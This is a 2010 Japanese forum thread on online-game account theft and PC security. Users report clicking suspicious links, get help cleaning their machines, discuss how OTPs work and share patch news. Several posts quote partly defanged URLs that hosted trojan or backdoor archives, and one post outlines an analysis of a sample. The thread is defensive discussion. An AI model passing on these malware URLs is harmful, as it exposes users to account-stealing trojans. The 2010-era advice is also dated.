ゲーム名はもう忘れちゃったけど <> (○口○*)さん<>sage<>10/02/15 09:32 ID:Ge2F8Mgg0<> pixivで垢ハックが流行中らしい、とかなんとか <> (○口○*)さん<>sage<>10/02/15 09:34 ID:xQEaTTd60<> pixiv今見てたんだけど! <> (○口○*)さん<>sage<>10/02/15 11:41 ID:WLVMqdfJ0<> >>493
同人のノベルゲームによく使われる奴が検知されるんじゃなかったかな。 <> (○口○*)さん<>sage<>10/02/15 12:22 ID:A1QQQV6U0<> >らしい、とかなんとか

不明瞭な情報で不安を煽るだけってのは勘弁して欲しい <> (○口○*)さん<>sage<>10/02/15 14:53 ID:NZtX4j1s0<> これか。
ウイルスではなく、フィッシングかソーシャルハックの方が疑われる事例だけど。
ttp://tsushima.2ch.net/test/read.cgi/news/1266156069/
ttp://honihoninosu.blog41.fc2.com/blog-entry-28.html <> (○口○*)さん<>sage<>10/02/15 14:59 ID:NZtX4j1s0<> もうちょっと調べてみたら、アカウント自体が乗っ取られた訳ではなく、pixivのコメント欄にCSRFが存在する疑いが強くなってきた。 <> (○口○*)さん<>sage<>10/02/15 22:07 ID:j08pTpcA0<> アカハク露店を見つけたんですけど、どうしたらガンホーに対策とってもらえますか? <> (○口○*)さん<>sage<>10/02/15 22:09 ID:tLpZ//e70<> サポートの存在も知らないのか <> (○口○*)さん<>sage<>10/02/15 22:21 ID:WDIelvDC0<> >>500
Webヘルプデスクから報告 <> (○口○*)さん<>sage<>10/02/16 09:02 ID:Fq4dqJ2v0<> Windows 7は、USBメモリの実行ファイルを起動できないよう設定可能
ttp://www.atmarkit.co.jp/fsecurity/rensai/tipstoday10/tips03.html <> (○口○*)さん<>sage<>10/02/17 17:06 ID:/lhEWgYy0<> AdobeReader9.3.1
今回はアップデートプログラムのみ
ttp://www.forest.impress.co.jp/docs/news/20100217_349461.html <> (○口○*)さん<>sage<>10/02/18 01:01 ID:Kcw49x0W0<> ttp://www.sakura.ad.jp/news/archives/20100217-001.news
.ftpaccessの設定が可能になった
FTP接続全拒否でSFTP/SSHに限定することも可能 <> (○口○*)さん<>sage<>10/02/18 13:43 ID:YgvuMZ8n0<> Firefox 3.5.8がリリース
重要度最高のセキュリティアップデートが3件 <> (○口○*)さん<>sage<>10/02/18 14:54 ID:KtT9j9N20<> ttp://mozilla.jp/firefox/download/older/
3.0系(更新は2月で終了)の3.0.18をリリース
3.5系(更新は8月で終了)の3.5.8をリリース

3.6系は今回なし <> (○口○*)さん<><>10/02/22 00:33 ID:3FAN5NVu0<> 【      気付いた日時          】 2/21 21:49:00
【不審なアドレスのクリックの有無 】
http://okinny■heypo■net/image/852
http://static■okinny.heypo■net/200907301738/js/analytics■js
【     OS    】win2k sp4
【使用ブラウザ 】 opera9.27
【WindowsUpdateの有無】 最新
【 アンチウイルスソフト 】avast
【その他のSecurty対策 】 Spybot S&D
【 ウイルススキャン結果】 aguse→マルウェア無し Dr.web R→クリーン niftyウィルスチェックサービス→ウィルス無し
Spybot S&D→Right Media(トラッキングクッキー)
avast→C:\WINDOWS\SYSTEM32\ir32_32.dll 検査不能:高性能ファイル爆弾です
(Right Mediaとir32_32.dllはたぶん今回は関係ないと思います)
【hostsファイルの変更】無
【PeerGuardian2の導入】無
【説明】
相談を。operaでjava scriptをonの状態で上記のサイトに入ったら
avastがウィルス検知して遮断しまして、ログで
SYSTEM 544 Sign of "HTML:Iframe-inf" has been found in "http://static■okinny■heypo■net/200907301738/js/analytics■js" file■
とあって、analytics.jsはググるとGoogleAnalytics用のトラッキングコード埋め込み用としか出てきません
これだけ見るとウィルスには見えないのですが
ただ、インラインフレームをオフ設定にしても無理矢理オンにしてくるようです。

これはウィルスなんでしょうか?または危険性はどの程度のものなんでしょうか
私にはこれ以上の事は分からなかったので情報や意見お願いします。 <> (○口○*)さん<>sage<>10/02/22 14:05 ID:vWoehusQ0<> Firefox3.6にしたらIETabが…orz <> (○口○*)さん<>sage<>10/02/22 14:37 ID:1cqFSAwg0<> >>509
Coral IE Tab <> (○口○*)さん<>sage<>10/02/22 16:34 ID:puNaP7i10<> 鼬飼い <> (○口○*)さん<>sage<>10/02/22 23:37 ID:jLC/GhHH0<> >>510
Coral IE TabはIEや素のIE Tabとの挙動の違いで表示できないサイトもあるようだし、あとはこんな話もある。
ttp://slashdot.jp/comments.pl?sid=482667&cid=1707554
>IE Tabは純正のIEよりセキュリティで劣るので(保護モードで動作しない等)、素直に純正のIEをIE Viewで表示してます。
>プラグインのプロセス分離が実現されたら保護モードで動作させる機能も付けてくれないかなあ。 <> (○口○*)さん<>sage<>10/02/23 08:54 ID:AMUr3NOu0<> よほど込み入ったことをしているのでなければ、IEのエンジンを使いたいなら
IEコンポーネント採用ブラウザかIEそのものを使った方がいい <> (○口○*)さん<>sage<>10/02/24 01:22 ID:Uj4F5C3v0<> Adobe Download Managerに任意のプログラムを自動的に
インストールさせることができる欠陥があるらしい
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/02.html#20100223_Adobe

パッチはまだ無し

暫定対策はAdobe Download Managerをアンインストールする
(Adobe Download Managerは無くても動作に支障なし) <> (○口○*)さん<>sage<>10/02/24 01:26 ID:SelDH/v/0<> アドオン作っておいてそれか!

その下にOpenofficeの事が書いてあるが、アプリから更新しようとしたら
最新ですといわれた… <> (○口○*)さん<>sage<>10/02/24 01:31 ID:K0IZvGaT0<> Adobeの能なしぶりには参るぜ <> (○口○*)さん<>sage<>10/02/24 01:32 ID:Uj4F5C3v0<> 自動アップデートは本当の最新版ではなく、同系列の最新版だけをチェックすることが多いので注意だ <> (○口○*)さん<>sage<>10/02/24 01:44 ID:SelDH/v/0<> いわば必須と言えるアプリや拡張機能に関しては
MSから歩み寄ってMicrosoft Updateに取り込んでもらいたいところだ <> (○口○*)さん<>sage<>10/02/24 05:29 ID:GpDAZzfV0<> その辺りはMacOSの方が先を行っているんだよね。
Googleがxmlベースで提供しているUpdate Engineフレームワークとか、オープンソースでappcastingを活用している
Sparkleフレームワークあたりが有名どころ。

Linux系やBSD方面の解説は誰かに任せた。 <> (○口○*)さん<>sage<>10/02/24 08:18 ID:5NCG3kam0<> エフセキュアの無料マルウェア駆除ツール「オンラインスキャナ4.2」がOperaとGoogle Chromeにも対応
ttp://blog.f-secure.jp/archives/50352359.html <> (○口○*)さん<>sage<>10/02/24 11:16 ID:6yGI89RR0<> windowsでMacosより進んでるモノってあったっけ?
シェアはwindowsが圧倒してるけど先進性では逆転するよな。 <> (○口○*)さん<>sage<>10/02/24 11:38 ID:5NCG3kam0<> そういうのは宗教戦争になるからやめようぜ <> (○口○*)さん<>sage<>10/02/24 20:35 ID:koFnc95v0<> 少し前からFlashと一緒にAdobe DLMとやらがインスコされるようになって
「怪しい物を勝手に入れやがってAdobeクソス」と都度DLMを削除していた俺に隙はなかった
AppleのオッサンじゃないけどFlashは早く廃れて欲しい <> (○口○*)さん<>sage<>10/02/24 20:52 ID:RduHbCz70<> マクロメディア… <> (○口○*)さん<>sage<>10/02/24 21:11 ID:JBUnG1ov0<> >>523
DLMのインストールを要求してくるけどキャンセルして、下にある「自動的にダウンロードを
開始しない場合」のリンクをクリックすると本体だけインストール可能だったりする <> (○口○*)さん<>sage<>10/02/24 23:03 ID:2ATNfeXu0<> インストーラを落としてインストールしてる自分にはAdobe Download Managerとか何それでしかない <> (○口○*)さん<>sage<>10/02/24 23:11 ID:qNASKAWB0<> 何その俺様えらい的 <> (○口○*)さん<>sage<>10/02/24 23:47 ID:XOSLwEZf0<> Flash_Reader_Updateを使えば、わざわざAdobe DLMに煩わされる心配も無いし、
Flash PlayerもIEとNPプラグインまとめて更新できるから便利。 <> (○口○*)さん<>sage<>10/02/25 11:47 ID:5nig/j1T0<> Flash_Reader_Updateって信頼できる?
そいつにマルウェアが仕込まれてたらどうするの? <> (○口○*)さん<>sage<>10/02/25 11:56 ID:8puUzXEb0<> きりがない <> (○口○*)さん<>sage<>10/02/25 12:01 ID:U1Bx9a5L0<> 〜なら心配ない、とか言って油断してると怪我の元 <> (○口○*)さん<>sage<>10/02/25 12:27 ID:pyN/wOsl0<> 配布元を信用するかどうかの問題。自己責任でご判断下さい。 <> (○口○*)さん<>sage<>10/02/25 13:06 ID:GnyAXNsn0<> 何にでも疑いを持つなら、OSS以外は使わない方が良い。
M$ Windowsの使用も止めた方が安全だよ。 <> (○口○*)さん<>sage<>10/02/25 18:22 ID:OFx1/fAp0<> 紙と鉛筆とソロバンと計算尺と定規なら安全だよ <> (○口○*)さん<>sage<>10/02/25 18:57 ID:BIXTZE3K0<> >紙と鉛筆とソロバンと計算尺と定規
その気になればどれを使っても人を殺せるね <> (○口○*)さん<>sage<>10/02/25 19:00 ID:GP0GeNGx0<> OSSなら安全だと勘違いしてる子が。 <> (○口○*)さん<>sage<>10/02/25 23:15 ID:FbzZrEOF0<> 1行目と2行目をいっしょくたにそう読み取るのは早計。 <> (○口○*)さん<>sage<>10/02/25 23:52 ID:OFx1/fAp0<> ソースとバイナリが同一である保証は無いから、自分でコンパイルしないとダメだな

しかしコンパイラーにマルウェアが(ry <> (○口○*)さん<>sage<>10/02/26 03:10 ID:sIt/Soir0<> >>514のリンク先にも追記で記載があるけど
Adobe DLMの脆弱性は修正された模様
http://internet.watch.impress.co.jp/docs/news/20100225_351159.html <> (○口○*)さん<>sage<>10/03/01 17:50 ID:XlkkToGm0<> ちと聞きたいんだがワンタイムパスワードって使うとしたら常時?

例えばネカフェ行く時に、家でガンホーIDパスワード変更→
ネカフェで変更後のパスとワンタイムパス入力→
ネカフェから帰った後ガンホーIDパスワードを元に戻す
という使い方でも効果あるのかな?

今まで5分ぐらいのとこにネカフェがあって家出る前にパス変更して
家に帰った後パスを元に戻してたんだがそのネカフェがつぶれちゃって…

当然常時ワンタイムパスでログインすればいいんだけど
さすがにめんどいしな… <> (○口○*)さん<>sage<>10/03/01 18:21 ID:8tPras210<> 使わないよりは効果あるけど、自宅PCのウィルス感染時に効果がないから価値が激減 <> (○口○*)さん<>sage<>10/03/01 18:23 ID:f2hQoBpI0<> ありと言えばありだと思うけど、何かそっちの方が面倒臭く無いかな
と思う携帯が古すぎて対応機種にすらなってない俺が言って見る
対応機種もってない人でワンタイムパスワード使いたいって人には
どうするつもりなんだろうなあ
携帯アプリじゃなくてトークン形式にしてくれれば良かったのに <> (○口○*)さん<>sage<>10/03/01 23:12 ID:fjQzrftj0<> OTPの穴ってなんだろう・・・お金が掛かるとか対応していない機種があるとか除いて
仮にパソコンがウイルスに感染したとしても、
突破するには6桁の数字を正しく入力するか直接携帯を見るかしか無いだろうし・・・
・・・あれ、もしかして前者は案外簡単だったりする? <> (○口○*)さん<>sage<>10/03/02 08:59 ID:Jv98tECW0<> 利用者よりも先にOTPを使うってどうやるんだよw

ところでこれの仕組みがよくわからんのだが、
長い周期でループする乱数を使っているってこと?
何度でも発行できるって事は、実際に有効なのは
使用済みの乱数よりも後にあって、しかも極端に離れた
ところにないものに限る、とか? <> (○口○*)さん<>sage<>10/03/02 09:23 ID:iYk6A6vx0<> 一応、FF11では中間者攻撃による被害例も有る様子。
使用環境そのものがマルウェアに感染していた場合、OTPも含めて通信内容を丸ごと横取りし、攻撃者が
その認証内容でログオン、各種資産を奪う。
初回は普通にログオンさせ、アカウントの有効性と、スクリーンキャプチャ傍受などでプレイヤー環境の価値を判断、
途中で通信を遮断し、再ログオンの入力内容を掠め取るといった流れが想定されていた。

>>544
個々のOTP装置シリアルに応じて、ある程度固有の乱数表、あるいはパスフレーズ生成式が用意されている。具体的な周期などは不明だが。
時刻がキーの生成に使われ、サーバとクライアントの時刻誤差をある程度許容できるように、多少余裕を持った有効期限が存在する。
もう少し詳しい内容は↓あたりを参考にでも。
ttp://www.itmedia.co.jp/enterprise/articles/0610/17/news004_3.html <> (○口○*)さん<>sage<>10/03/02 13:15 ID:Jv98tECW0<> >>545
d
時刻でパスワードを限定するのね
考えたら至極当然の仕組みだな

この辺はゲームに限らず、個人認証で重要になる技術
サーバとの通信をどんなにセキュアにしても、端末があちこちにアクセス
できてしまうインターネットに繋がっている限りは漏洩の可能性が
残るから、割に合わないほどに強度を上げない限りはいたちごっこか <> (○口○*)さん<>sage<>10/03/02 14:41 ID:UXWpoaM+0<> >>545
>一応、FF11では中間者攻撃による被害例も有る様子。
>使用環境そのものがマルウェアに感染していた場合、OTPも含めて通信内容を丸ごと横取りし、攻撃者が
>その認証内容でログオン、各種資産を奪う。

ttp://www.mmobbs.com/uploader/files/8358.jpg
図で表すとこういうことか・・・
今まで通り、感染しないように、注意は怠ってはいけないということだね
だがここまでして盗もうとするなんて・・・すごい執念だな・・・ <> (○口○*)さん<>sage<>10/03/02 16:09 ID:ijCWrTYK0<> 「ヘッカーって何だろう」とか思っちまったじゃないかw <> (○口○*)さん<>sage<>10/03/02 18:34 ID:xD1gSufp0<> ログインにワンタイム使ってるが、2,30秒くらいで次のナンバーに変わるぜ

その隙に入り込まれるくらい密にデータ傍受されてログインされるってことは
既に個人情報全て抜き取られてるってくらい密接に色々やられてるだろ・・・
例えるならば、既にお前の部屋に監視カメラ置かれて24時間監視されてるというレベル

つーか、ログイン毎にパス変わるから傍受しても無理だと思うんだが
ワンタイム入れたすぐ後に、同じPCから別アカにログインする場合は入力省略されるが
AのPCからログイン後、すぐに別のBのPCからログインしようとすると別のパスを要求されるぜ? <> (○口○*)さん<>sage<>10/03/02 18:37 ID:xD1gSufp0<> あぁすまん、遠隔操作されるくらいならハックとかやられるな
・・・その時点で色々オワットルだろ・・・ <> (○口○*)さん<>sage<>10/03/02 18:53 ID:uUewoU2e0<> ネットカフェならスニファーくらい平気で仕掛けられてそうだけどな <> (○口○*)さん<>sage<>10/03/02 19:11 ID:bDIx6Wqw0<> ハクに気づいたときにアカウントを一時停止するソリューションが必要か
まあガンホーの場合はまめに起動ロック使えって話になる。無料だし <> (○口○*)さん<>sage<>10/03/02 20:35 ID:3h8XSZAl0<> ワンタイムパスワード利用権てガンホーIDごとに買わなきゃダメなの?
昔まちがってID二つ作っちゃったから二重に料金取られちゃう <> (○口○*)さん<>sage<>10/03/02 20:54 ID:zf3wzFvG0<> [F1]キーを押さないで!---Windowsに新たな脆弱性
http://itpro.nikkeibp.co.jp/article/NEWS/20100302/345226/ <> (○口○*)さん<>sage<>10/03/02 21:41 ID:xD1gSufp0<> ※携帯アプリ(SecureOTP Mobile)は、複数のガンホーIDに登録できます <> (○口○*)さん<>sage<>10/03/02 21:48 ID:aPUg2MOLO<> ものすごい申し訳ない質問なのですが、先日安めのノートパソコンを買いました。
thinkpadのR60です。

すごい美品で、快適にサブとして利用できるかなと思い、とりあえずリカバリー(Thinkpadは起動時にキー押しで工場出荷状態へ)してみました。

リカバリー後にトレンドマイクロオンラインスキャンをして、AVGのフリーウィルスソフトを導入して全スキャン。

ここまでで異常ないようなのですが、これやっておけ的なことって他にありますでしょうか?

異常なまでに心配性で、そのくせ新品買わなくてすいません。

長文駄文失礼しました。 <> (○口○*)さん<>sage<>10/03/02 21:55 ID:AxxOCDZS0<> >>556
HDDフォーマットしてWindowsクリーンインストール <> (○口○*)さん<>sage<>10/03/02 22:14 ID:aPUg2MOLO<> >>557
わかりました。やってみます。ありがとうございました! <> (○口○*)さん<>sage<>10/03/02 22:21 ID:MA+UKK5F0<> >>556
LANケーブルを引っこ抜いて、無線LANも切って、二度と繋がない。 <> (○口○*)さん<>sage<>10/03/02 22:32 ID:zf3wzFvG0<> >>556
クリーンインストールしてる間は物理的にネットへつながない
アンチウイルスだけじゃなくFWもいれたほうがいいんじゃね <> (○口○*)さん<>sage<>10/03/02 23:36 ID:aPUg2MOLO<> >>560

ありがとうございます。LAN抜きながらやります。

ROの為に3PC目ですが、潔癖症なら新品にしたほうがよかったと痛感しました。

次アンインスコしたらカスペお試し入れてみます。


カスペオンラインスキャンできないのがつらいです。 <> (○口○*)さん<>sage<>10/03/03 00:02 ID:WlZkgbAw0<> ニフティもだめなの? <> (○口○*)さん<>sage<>10/03/03 00:31 ID:TEdzGe2o0<> いい加減皮肉られてることに気付いて引っ込め。

>>557は>556でやってるリカバリと同等。違いは、余分なアプリが入るかどうかだけなので、セキュリティ的に無関係。
>>559は明確な煽りだが、趣旨としては>560の応用。やればセキュリティ的には完璧。

WindowsUpdateは全てあてろ(セキュリティ万全のPCでSP+メーカー使ってFixディスク作ると便利)
セキュリティソフトはパターンを最新に更新しろ
PeerBlockで適切なIPブロックしとけ
AcrobatReaderではScriptを切れ
Adobe関係は全て最新に更新しとけ
オートランは切れ、USBメモリやその他の記憶媒体を繋ぐな
…Etc

セキュリティに完璧はありませんので悪しからず。 <> (○口○*)さん<>sage<>10/03/03 00:42 ID:M3Si2wCC0<> セキュリティ的には完璧とか言っておきながら完璧はありませんって・・・
クリーンインストールとリカバリを同等扱いしてる人はすごいですね <> (○口○*)さん<>sage<>10/03/03 00:55 ID:TdK9qUgb0<> ちょっと質問なんだけど、ガンホーのログイン画面に入るとページタブのアイコンがうんこマークになるんだが、これはなんなんだろうか
症状はサブPCのみでメインのほうはガンホー社のロゴがでるんだが <> (○口○*)さん<>sage<>10/03/03 02:59 ID:9QBfXdeH0<> 糞会社だけに <> (○口○*)さん<>sage<>10/03/04 06:49 ID:4lCEGOrz0<> すみません明け方から申し訳ないのですが質問でこちらに来ました。
まだアカハック被害にはなってないのですがされてしまうかもと思い、対策を聞きにきました(´・ω・`)


【      気付いた日時          】 3月4日午前3時頃
【不審なアドレスのクリックの有無 】 2chのスレ http://www■4gameranking■com/flash/0020856■zip
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 Yes 最終利用日は1月です
【     OS    】 WindowsVista、ServicePack1
【使用ブラウザ 】 InternetExplorer7
【WindowsUpdateの有無】 ちょっと分かりません・・・どうやって調べるのでしょうか・・・
【 アンチウイルスソフト 】 ウィルスバスター2010
【その他のSecurty対策 】 ルーターで無線って事なのでしょうか・・・
【 ウイルススキャン結果】 いくつか出てきましたがよく分かりませんでした
【スレログやテンプレを読んだか】 今から読みます
【hostsファイルの変更】無 
【PeerGuardian2の導入】無
【説明】 3月4日の午前3時頃にアカハックのURLを踏んでしまいました。
     踏んでしまった際にウィルスバスターの警告画面になり、アカハックURLを踏んでしまったと気づきました。
     踏んでしまったメインPCでROを起動したままでログアウト後にアカハックにあってしまうのではと不安です。
     警告画面なので感染してしまったのか分からなく、対策を聞きにきました。
     気を抜いていて踏んでしまった自分が本当に情けないです。
     踏んでしまった直後にサブPCでアトラクションIDの変更を行いました。
     こういう事は初めてで、専門的なことは分からなく説明不足かもしれませんが教えていただけると助かります。 <> (○口○*)さん<>sage<>10/03/04 09:16 ID:dNbeJpvJ0<> >【不審なアドレスのクリックの有無 】 2chのスレ http://www■4gameranking■com/flash/0020856■zip

どう見ても、アカハック間違い無しです。

>【WindowsUpdateの有無】 ちょっと分かりません・・・どうやって調べるのでしょうか・・・

IEを起動し、ツールからWindowsUpdateを実行。

>【 ウイルススキャン結果】 いくつか出てきましたがよく分かりませんでした

幾つか出てくる時点でアウトです。早急にPCリカバリ、またはOSの再インストールを行ってください。

>     警告画面なので感染してしまったのか分からなく、対策を聞きにきました。

正確なメッセージや、スキャンによる検出結果がないと、エスパーじゃないのでなにもわかりません。

基本的にzipは落としただけでは感染せず、解凍して実行しなければ動きませんが、拡張子偽造などなら
そのまま感染することも。

>     踏んでしまったメインPCでROを起動したままでログアウト後にアカハックにあってしまうのではと不安です。
>     踏んでしまった直後にサブPCでアトラクションIDの変更を行いました。

起動中に踏む→ログアウト(まだパスワードは盗まれていない)
クリーンなPCからパス変更(パスワードは盗まれない)
感染したPCでパスワード入力・変更を行わなければ基本的には大丈夫です。

【行わなければならないこと】
必要なデータのバックアップを行った後(ROならSSやエンブレムキャッシュ、一般アプリなら作成したデータ、
メールソフトのデータやIEのお気に入りなどもバックアップすると良いでしょう)、PCのリカバリorオS再インストール。 <> 567<>sage<>10/03/04 09:38 ID:4lCEGOrz0<> 567です教えていただきけてうれしいです。ありがとうございます(´・ω・`)

スキャンの結果ですがセキュリティの脅威のCookie検出と出たのでウィルスなんでしょうか・・・

ROはアイテムの移動とログアウトした時間をメモとったりして一旦ログアウトさせました。

Windowsアップデートも行いました。
URLを踏んでしまったメインPCで装備移動させるためにキャラクターセレクトのパスワードを入力したしまったので
今から急いでサブPCでパスワードを変えようと思います。

バックアップも今から方法を調べてやってみます。リカバリか再インストしてまた気合で無線LANの設定もしてみます(´・ω・`)

サブPCもメインPCも無線LAN接続なのですがサブPCには何の影響も無いのでしょうか・・・?
何度も聞いて申し訳ありませんorz <> (○口○*)さん<>sage<>10/03/04 10:12 ID:JA3e1Bto0<> >>569
ウイルス感染後に、サブPCとメインPCでファイルのやりとりをしていなければ、問題無いです。 <> (○口○*)さん<>sage<>10/03/04 10:27 ID:dNbeJpvJ0<> >URLを踏んでしまったメインPCで装備移動させるためにキャラクターセレクトのパスワードを入力したしまったので
>今から急いでサブPCでパスワードを変えようと思います。

大馬鹿者〜最悪のことを…キャラパスだけだからまだいいものの…WindowsUpdateより先に、PCのリカバリだろうが。

1.(仕方ないので)サブPCでキャラパス変更
2.メインPCをネットワークから物理的に切断
3.最低限必要なデータをバックアップ
4.PCリカバリorOS再インストール
5.WindowsUpdateを全てあてる(ここで初めてネットワークに接続)
6.セキュリティソフトの導入とパターン更新
7.必要なアプリの導入
8.バックアップしたデータをスキャンして不審なファイルが見つからないことを確認した上で戻す
9.ROをプレイ <> (○口○*)さん<>sage<>10/03/04 11:15 ID:Msen2nR30<> 個人的にこういう検体の情報はありがたい。
拾ってみた。ファイル名はzipだけど実際はrar。
解凍すると MS-aionPlayncmaohuaJP■exe AIONのファイルを偽装しているくさい。
700kB以上とトロイにしちゃデカすぎるので7-Zipで解凍したら
2008年のコミケの同人絵(たぶん増量用のダミー)と
製造日が2月2日のmxd■exe。PcClient系バックドア。
ttp://www.virustotal.com/analisis/512be79b4fb0d0830c316723525422875e1ad3159b6692859f7e5f970c080a54-1267668496
バスター(Trendmicro)はスカったので提出済み。 <> (○口○*)さん<>sage<>10/03/04 18:53 ID:eJMlRrcs0<> >>569
メーカー製PCならリカバリ後に古いAdobeReader(AcrobatReader)が
インストールされる可能性がある
そこらへんもちゃんとアップデートさせましょう
Readerに関しては使わないならアンインストール
Javaランタイムもだな <> (○口○*)さん<>sage<>10/03/04 21:07 ID:O9ZkQ9/R0<> 一通りアップデートが終わったと思ったら、SecuniaPSIを走らせるのだ。
あれ、オンラインサービスになったらいいのにね。 <> (○口○*)さん<>sage<>10/03/04 22:14 ID:s/rK1BEV0<> SecuniaOSI というオンライン版あるよ! <> (○口○*)さん<>sage<>10/03/04 22:17 ID:0c0S7hai0<> >>574
SecuniaOSI
MyJVN バージョンチェッカ <> (○口○*)さん<>sage<>10/03/04 22:19 ID:O9ZkQ9/R0<> あ、あったのかすまんorz <> (○口○*)さん<>sage<>10/03/06 15:32 ID:t9d99j2b0<> Operaブラウザに深刻な脆弱性、パッチは未公開
ttp://www.itmedia.co.jp/enterprise/articles/1003/05/news014.html

あまり細かく書かれていないけど、回避方法は別のブラウザを使う以外は無いと言うことかな? <> (○口○*)さん<>sage<>10/03/07 01:52 ID:Qk0PyMul0<> 【      気付いた日時          】 3/6 22:00頃
【不審なアドレスのクリックの有無 】 R.M.CのHeimdalレア装備板 http://jpan■jp/?Qw3x
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 Yes
【     OS    】 Windows 7 64bit
【使用ブラウザ 】 FireFox 3.6
【WindowsUpdateの有無】 昨日に確認
【 アンチウイルスソフト 】 ESET Smart Secrity 4.0
【その他のSecurty対策 】 特に無し FirefoxのNo Script使用程度です。
【 ウイルススキャン結果】 上記アンチウィルスソフトで検索結果、HIT無し
【スレログやテンプレを読んだか】 今から読みます
【hostsファイルの変更】 無
【PeerGuardian2の導入】 無
【説明】
サブPCで、R.M.C(http://www5.big.or.jp/~haya/rmc/)のHeimdalレア装備板で
「買)アンフロ風鎧38M」の記事内【その他コメント】欄にあるURLをクリックしたところ
以下の警告がESETより発せられました。

--------------------------------------------------------------------
http://www■matubusi■net/zhu/yanyan■rar
Win32/Kryptik.BMの亜種 トロイの木馬
接続が切断されました - 隔離しました
--------------------------------------------------------------------

ファイルをDLしようとしたみたいですが、行っておりません。
速やかに有線LAN及び無線LANを切断し、ウィルスキャンを行ったところ
脅威となるものの検出は行われませんでした。

その後、メインPCでガンホーID/PWの変更、キャラクターの全PW変更を行いました。

現在メインPCで確認しておりますが今のところ何らかのアクションは無いようです。


こういったrar形式やzip形式をDLさせるタイプは
URLを踏んだだけでアカウントハックが実行されるのでしょうか。
それともDLを行ったファイルを解凍しなければ問題ないのでしょうか。

今からテンプレとスレログ確認してきます。 <> (○口○*)さん<>sage<>10/03/07 02:21 ID:fjnquMeo0<> 怪しいURLは絶対クリックしません
怪しいURLは絶対クリックしません
怪しいURLは絶対クリックしません

モニタのとこに付箋でも貼っておきましょう <> (○口○*)さん<>sage<>10/03/07 03:14 ID:DKnmX56R0<> >>579のURLをhttp://www.gred.jp/でチェックしてみたけど、どっちも安全って……

ひょっとしてダメチェッカー? <> (○口○*)さん<>sage<>10/03/07 04:08 ID:VAcBYa+z0<> >>581
単に転送しているだけだしね。でもチェッカーを過信するのは阿呆。

>>579
解凍して実行しないと発動はしない。

ただし、他の何かを同時にダウンロード・起動させていてすり抜けている可能性もあるため安全である保証はできません。
ESETだとなんか抜けてそうな気がしなくもない。

安全策をとってOS再インストールコースにするか、ダウンロード前にブロックしたと安心して(複数のエンジンでオンラインスキャン
をするなどしてチェックした上で)使い続けるかは自己責任になります。 <> 579<>sage<>10/03/07 05:49 ID:Qk0PyMul0<> >>582

やはり確実に安全とは言えませんよね…

今回は安全策としてOSを再インストールしました。

今後は不用意にURLをクリックしないようにしたいと思います。

ありがとうございました。 <> (○口○*)さん<>sage<>10/03/07 08:11 ID:91x/TYdC0<> >>578
これみてSecuniaPSIやったら
firefoxとoperaが(査定: 安全にブラウジングできません。このブラウザを使用した場合、少なくとも 1 個の致命的な攻撃ベクターが存在します。)
でIEが(査定: このブラウザに対し少なくとも 1 個の攻撃手法が存在します。下記重大性の評価を参照してください)とか
IEのほうがまだ安全じゃないか?という変な状態になっていた <> (○口○*)さん<>sage<>10/03/07 09:02 ID:BSGIYZDs0<>

>>568にて
>必要なデータのバックアップを行った後(ROならSSやエンブレムキャッシュ、一般アプリなら作成したデータ、
>メールソフトのデータやIEのお気に入りなどもバックアップすると良いでしょう)
と書かれていますが>>570にて
>ウイルス感染後に、サブPCとメインPCでファイルのやりとりをしていなければ、問題無いです。
↑はつまり感染したPCからバックアップしたデータファイルなどをリカバリorクリーンインストールしたHDDに
入れちゃだめって事ですか? <> (○口○*)さん<>sage<>10/03/07 10:38 ID:orCBlruk0<> >>585
あんまり突き詰めようとすると、誰も何も答えられなくなるよ。
世の中に絶対なんてあり得ない。 <> (○口○*)さん<>sage<>10/03/07 11:18 ID:VAcBYa+z0<> >>585
バックアップしたデータの中に、感染したファイルがまぎれていないか確認してから戻しましょう。
つまり、OS入れなおしたPCにバックアップデータを戻すよりも、セキュリティソフトの導入とパターン更新を先にやれ。 <> (○口○*)さん<>sage<>10/03/07 11:19 ID:dqiTQkBx0<> p://www.itmedia.co.jp/enterprise/articles/1003/04/news064.html

FirefoxはこのPNGライブラリの脆弱性が塞がれていない
IEは塞がれているからIEの方がまだ安全という結果になったのでは? <> (○口○*)さん<>sage<>10/03/07 22:47 ID:YwM3+Wa/0<> >>580
どれが怪しいURLかわからなくなってるから
それは言わない方が良いんじゃね <> (○口○*)さん<>sage<>10/03/07 23:57 ID:6HhBZZYL0<> ニフティの常時安全セキュリティ24で、
自分自身が作ったファイル(base169.kdc)に誤爆するみたい。
除外してアップデートすると直るそうだ。 <> (○口○*)さん<><>10/03/10 15:19 ID:InTVW0050<> 月例age 計2件 (重要 2件)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms10-mar.mspx
ttp://blogs.technet.com/jpsecurity/archive/2010/03/10/3317967.aspx <> (○口○*)さん<>sage<>10/03/10 19:18 ID:MYjj91If0<> IE 6と7に未修正の脆弱性見つかる、既に標的型攻撃の発生も
ttp://www.itmedia.co.jp/news/articles/1003/10/news025.html

IE8は影響なし らしい <> (○口○*)さん<>sage<>10/03/11 05:01 ID:cMaq3b/00<> クルパラスレにあったもの。よく見掛ける日本のあぷろだに置かれるトロイかな。

172 :ere544 :10/03/11 03:59 ID:/S+AU8X+0
RO スパノビ冒険日記 : 最終指令「転生DOP6人を全て倒せ!!」
tp://www■dotup■org/uploda/www■dotup■org715002■zip <> (○口○*)さん<>sage<>10/03/11 05:06 ID:cMaq3b/00<> >>593
日本で使われてそうなベンダーは対応済みぽい。

zip(30/41)
ttp://www.virustotal.com/analisis/b5fbec15109e2229b7ab0d8d2524916ceff4e369fcaae3a22a8fd64e1d4a4a13-1268251315

exe(31/41)
http://www.virustotal.com/analisis/772e1ad370c65b5c83f294ad89cbc1663eba28c74ec10a49e94610de4958055b-1268251345 <> (○口○*)さん<>sage<>10/03/11 07:02 ID:mgj50bGO0<> バスターがスカってる。 <> (○口○*)さん<>sage<>10/03/11 10:56 ID:cMaq3b/00<> >>595
>TrendMicro 9.120.0.1004 2010.03.10 PAK_Generic.001

マルウェアというよりパッカーとして引っかかってるだけなんで、提出したら別の名前つくかもしれんけど
一応スカってはいないようですよ。 <> (○口○*)さん<>sage<>10/03/11 12:05 ID:exdpO9HB0<> >gred AntiVirus アクセラレータアップデートのお知らせ
